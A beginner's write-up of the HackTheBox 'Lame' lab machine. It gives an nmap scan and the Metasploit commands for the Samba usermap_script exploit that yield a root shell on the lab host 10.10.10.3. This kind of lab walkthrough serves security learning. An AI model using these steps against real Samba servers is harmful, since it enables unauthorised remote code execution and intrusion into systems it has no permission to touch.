This is the write up for Lame Lame is part of the Beginners track on HackTheBox. I’m using Metasploit to exploit this machine. I did this machine in less then 5 minutes
User and Root for Lame
First we do an scan
nmap -T4 -A -p- 10.10.10.3
We see Samba is running and we see a version number. One google string Samba 3.0.20-Debian exploit and we have found a nice exploit
It is from rapid7 the creators of Metasploit. Now boot up Metasploit by typing
mfsconsole
The site we found is already giving us the right commands to exploit this. We just need to follow it
use exploit/multi/samba/usermap_script
options
set LHOST <YOUR_MACHINE_IP>
set RHOST 10.10.10.3
run
Once the exploit have run then type in shell. It will spawn a better shell. The user.txt and root.txt are in the usual spots
Conclusion of Lame – HackTheBox
Did this box on my own within less then 5 minutes. I have learned Metasploit by just doing it. I also have bought a book in the past Metasploit: The Penetration Tester’s Guide. So I already knew something about Metasploit. Hacking in the early stages is nothing more then knowing the tools. At least that is what I think. I’m still in the beginning fase myself
And this conclude the write up for lame on hackthebox
